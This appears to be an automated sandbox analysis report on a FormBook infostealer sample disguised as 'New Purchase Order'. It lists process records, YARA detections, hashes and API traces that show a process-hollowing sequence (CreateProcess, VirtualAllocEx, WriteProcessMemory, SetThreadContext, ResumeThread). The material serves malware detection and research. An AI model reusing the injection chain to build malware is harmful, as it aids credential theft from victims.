                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:09:49:36
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe"
                                                        Imagebase:0xeb0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:09:49:39
                                                        Start date:03/12/2024
                                                        Path:C:\Windows\SysWOW64\isoburn.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                        Imagebase:0x80000
                                                        File size:107'008 bytes
                                                        MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:09:49:54
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe"
                                                        Imagebase:0xeb0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:17
                                                        Start time:09:50:06
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff722870000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:9.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:3.6%
                                                          Total number of Nodes:167
                                                          Total number of Limit Nodes:14

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teq$Teq$c+7
                                                          • API String ID: 0-3331098073
                                                          • Opcode ID: b60daead58e8602fb6d8b0a0570d972b0f33dcff538d64bd669847db75dd9fbb
                                                          • Instruction ID: 8e2e144f459a3ad28c124414e8de2d20ea5374b94469e38af7867a397671307d
                                                          • Opcode Fuzzy Hash: b60daead58e8602fb6d8b0a0570d972b0f33dcff538d64bd669847db75dd9fbb
                                                          • Instruction Fuzzy Hash: 5151C272A001658FCB08CF68C895BBEFFB2BF8D300B19856AD545AB255C7309A52CB91

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teq$Teq$c+7
                                                          • API String ID: 0-3331098073
                                                          • Opcode ID: b443860d4c34106a54bc015241566dc38c84eebdde8d0d792585057f2cdcf22a
                                                          • Instruction ID: 40fb5c5aaded2c75351489f82d451bbe9a5e31f6bf8be30942b5be0d8ed666bc
                                                          • Opcode Fuzzy Hash: b443860d4c34106a54bc015241566dc38c84eebdde8d0d792585057f2cdcf22a
                                                          • Instruction Fuzzy Hash: 09419375B502258FDB08DFA9C95567EFBB6BF8C200F11812AE516EB354CB708E11CB91

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: N7B
                                                          • API String ID: 0-3344257597
                                                          • Opcode ID: f53d2005fb897ec0265c156e330aa6bbab2382b4b9bbd376dca0512e553f2c92
                                                          • Instruction ID: 8b3760fc422b6d28b5dc6756018b712bc7b3394497d6ef677db50890e3ddacef
                                                          • Opcode Fuzzy Hash: f53d2005fb897ec0265c156e330aa6bbab2382b4b9bbd376dca0512e553f2c92
                                                          • Instruction Fuzzy Hash: C7329A74B012148FDB19DB79D850BAEBBF6BF89212F24446DE546DB390CB34E902CB61

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0814B8A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 9f128306378412231f9e363bcf1d824607779cbc7c0625fb178bb82e0234bf9f
                                                          • Instruction ID: 8e5cbe3bdfad2b8c345d183db546e4f05e17e769416be38b9666d2a8906002ea
                                                          • Opcode Fuzzy Hash: 9f128306378412231f9e363bcf1d824607779cbc7c0625fb178bb82e0234bf9f
                                                          • Instruction Fuzzy Hash: 2E915F71D04719CFEB24DFA8C8417EDBBB2BF48325F148569E848A7280DB749986CF91

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0814B8A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 6d023eca55487b1691f0fe8009d3e235f49688ec0a4c026c6857a88a920308c9
                                                          • Instruction ID: 1ca2a64a9c334262e3f8ef20ca3624015e2f24242ea24aca63c28fcb2be310ab
                                                          • Opcode Fuzzy Hash: 6d023eca55487b1691f0fe8009d3e235f49688ec0a4c026c6857a88a920308c9
                                                          • Instruction Fuzzy Hash: 02916F71D04719CFEB24CFA8C8417EDBBB2BF48325F148569E808A7280DB749986CF91

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 03129039
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1301 3127b0c-3129049 CreateActCtxA 1304 3129052-31290ac 1301->1304 1305 312904b-3129051 1301->1305 1312 31290bb-31290bf 1304->1312 1313 31290ae-31290b1 1304->1313 1305->1304 1314 31290d0 1312->1314 1315 31290c1-31290cd 1312->1315 1313->1312 1317 31290d1 1314->1317 1315->1314 1317->1317
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 03129039
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1318 814b3e0-814b436 1321 814b446-814b485 WriteProcessMemory 1318->1321 1322 814b438-814b444 1318->1322 1324 814b487-814b48d 1321->1324 1325 814b48e-814b4be 1321->1325 1322->1321 1324->1325
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0814B478
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1329 814b3e8-814b436 1331 814b446-814b485 WriteProcessMemory 1329->1331 1332 814b438-814b444 1329->1332 1334 814b487-814b48d 1331->1334 1335 814b48e-814b4be 1331->1335 1332->1331 1334->1335
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0814B478
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1339 814b248-814b29b 1342 814b29d-814b2a9 1339->1342 1343 814b2ab-814b2db Wow64SetThreadContext 1339->1343 1342->1343 1345 814b2e4-814b314 1343->1345 1346 814b2dd-814b2e3 1343->1346 1346->1345
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0814B2CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0814B558
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0814B2CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0814B558
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0814B396
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0814B396
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0312E99E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0814DD65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0814DD65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Instruction Fuzzy Hash: FF01F7B14043849AF7204A65CCC4B66FFDCDF80226F14C81AED4D4F183C2389840CAB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298235595.000000000197D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0197D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_197d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8462059a07e665150994a0a52b930dc861f99f7f39894202963eee8fd102acaa
                                                          • Instruction ID: a1e22a4bc6275dc6df974ea026b5c47ef13cdd9e4481eee6b42744051f45c897
                                                          • Opcode Fuzzy Hash: 8462059a07e665150994a0a52b930dc861f99f7f39894202963eee8fd102acaa
                                                          • Instruction Fuzzy Hash: DEF06D72404384AEE7208A1ADD84B66FFDCEF85735F18C55AED4C4B283C279A844CAB1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: qJ
                                                          • API String ID: 0-1955030436
                                                          • Opcode ID: cd7431d6aafdeb2afcfffb7a7f855951dc63a4fdcf386bc9d89aa36cafe20449
                                                          • Instruction ID: 1bc51e444e930669dbea21450eb4e26ec4cbe61759fc11f42072f0c9de7daa37
                                                          • Opcode Fuzzy Hash: cd7431d6aafdeb2afcfffb7a7f855951dc63a4fdcf386bc9d89aa36cafe20449
                                                          • Instruction Fuzzy Hash: 5931F371B042659FC708CA69D85046EBFF6FFD9200B2281BBE51ADB362D7348E51CB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c42350e9d8eb2ef8bd7caca20e3c3f41787efa7f357fce91f31b88bb6cde031
                                                          • Instruction ID: 16b6ade5b38ea2a8e1bef920d14f8ba17d38659614cb8b43fe554464d2a43072
                                                          • Opcode Fuzzy Hash: 6c42350e9d8eb2ef8bd7caca20e3c3f41787efa7f357fce91f31b88bb6cde031
                                                          • Instruction Fuzzy Hash: 0BE1F674E002198FDB14DFA9C580AAEFBB2FF89305F249169D815AB355D731AD42CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3133381e3a11c9363323546e5d763bfef59183067b33744c4a797cd3d3f85b5f
                                                          • Instruction ID: d9904c05fc604cb04ed371cd2bbc0ba1a823f7e5bed96380ac785736df9e92a0
                                                          • Opcode Fuzzy Hash: 3133381e3a11c9363323546e5d763bfef59183067b33744c4a797cd3d3f85b5f
                                                          • Instruction Fuzzy Hash: 1AE10774E002298FDB14DFA8C590AAEFBB2FF89305F248169D415AB355D735AD42CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae08bd187dbce6909a9152bb5ecb814b97437a8195d7d62af6204d59cd7194b6
                                                          • Instruction ID: c78216c18c5db021bcfd5801bdf1b949eb42cf71eeeb0a07f93a8cce1e4e89f0
                                                          • Opcode Fuzzy Hash: ae08bd187dbce6909a9152bb5ecb814b97437a8195d7d62af6204d59cd7194b6
                                                          • Instruction Fuzzy Hash: 24E10874E002198FDB14DFA9C580AAEFBB2FF89305F248169D419AB356D731AD42CF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6dae4454ba40954d6db2f769154957e142d02044c4c85d672bcb7321b04ca692
                                                          • Instruction ID: 1b16d92c6c3380080654febe83e2860641e7d696b18a31412843f4f144f4d430
                                                          • Opcode Fuzzy Hash: 6dae4454ba40954d6db2f769154957e142d02044c4c85d672bcb7321b04ca692
                                                          • Instruction Fuzzy Hash: FAE10674E002198FDB14DFA9C580AAEFBB2FF89305F24816AD415AB355D731AD42CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 190a33ce6f9d204d4c360e9efe20581889d7cf27a4278e934ed027edfc0aac32
                                                          • Instruction ID: a8898ebdd069c14a6d7c9afa7aae245311480a703fd8eeb7d428469df63da171
                                                          • Opcode Fuzzy Hash: 190a33ce6f9d204d4c360e9efe20581889d7cf27a4278e934ed027edfc0aac32
                                                          • Instruction Fuzzy Hash: 7AE10774E002198FDB14DFA9C590AAEFBB2FF89305F248169D419AB355D731AD42CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb24197364432f553fe2ea333e8435f54d134deb8b4fec6231cbeb7347f80cc5
                                                          • Instruction ID: 98cd195c523f6fb6b19333151b1716cd109ed8d3df4543dc3ae2a4ce89080227
                                                          • Opcode Fuzzy Hash: eb24197364432f553fe2ea333e8435f54d134deb8b4fec6231cbeb7347f80cc5
                                                          • Instruction Fuzzy Hash: 1F510774E002198FDB14CFA9C580AAEBBF2FF89305F24816AD419A7356D7359D42CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 160764fc2f974b8d6eb0fff1b47aa5f9c05ab0f6fcc59bea09158f5f6fc1aa98
                                                          • Instruction ID: 575dcccca1342c3dcb191f72e64b8b3feb5bb785eaac8a4e7220c11667f04deb
                                                          • Opcode Fuzzy Hash: 160764fc2f974b8d6eb0fff1b47aa5f9c05ab0f6fcc59bea09158f5f6fc1aa98
                                                          • Instruction Fuzzy Hash: C741D631618615CFC798CB79C98155EBBE6FB88210B558C6AE05ADB661D330D9A2CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8aaeb47f6c9bdd067ee3641d5e6d7847f361001c60e9edca6c7c1cd69139287d
                                                          • Instruction ID: 1607ab4408135e840f73548e05de44966d888aeb14d3110513fe7c87fc836a44
                                                          • Opcode Fuzzy Hash: 8aaeb47f6c9bdd067ee3641d5e6d7847f361001c60e9edca6c7c1cd69139287d
                                                          • Instruction Fuzzy Hash: A841DA31618615CFC798CB69C94165EBBE6FB88210B55CC2AE05ADB660D334E9A2CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6f4cb417607c210adf2ab9f79636a432fc1b5c8f6a077454028b2c60fc26e55
                                                          • Instruction ID: 1b8be3489c31dd028897fd7c11ede4248269a95f515759d11ac602834ccdac2c
                                                          • Opcode Fuzzy Hash: b6f4cb417607c210adf2ab9f79636a432fc1b5c8f6a077454028b2c60fc26e55
                                                          • Instruction Fuzzy Hash: 1541D1B9F1461A8FCB44CFA9C9814AEFBB6FB8C600B168927D415EB350C338C9518F91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 708e7625e91027c1df8138ae64dabd4e7aee6ce75078d2cc82dc72ee0fa9c11e
                                                          • Instruction ID: e8429a023b4daa0ba5b35f7b8d0c7e34e810e04271f4a589e704f37ef0abce6a
                                                          • Opcode Fuzzy Hash: 708e7625e91027c1df8138ae64dabd4e7aee6ce75078d2cc82dc72ee0fa9c11e
                                                          • Instruction Fuzzy Hash: BE41A2B9F1462A8FCB44CF99C9855AEFBB6FB8C600B118926D415EB350C338D9518F91

                                                          Execution Graph

                                                          Execution Coverage:1.2%
                                                          Dynamic/Decrypted Code Coverage:5.1%
                                                          Signature Coverage:8%
                                                          Total number of Nodes:138
                                                          Total number of Limit Nodes:8

                                                          Control-flow Graph

                                                          control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0

                                                          Control-flow Graph

                                                          control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0

                                                          Control-flow Graph

                                                          control_flow_graph 390 1732b60-1732b6c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
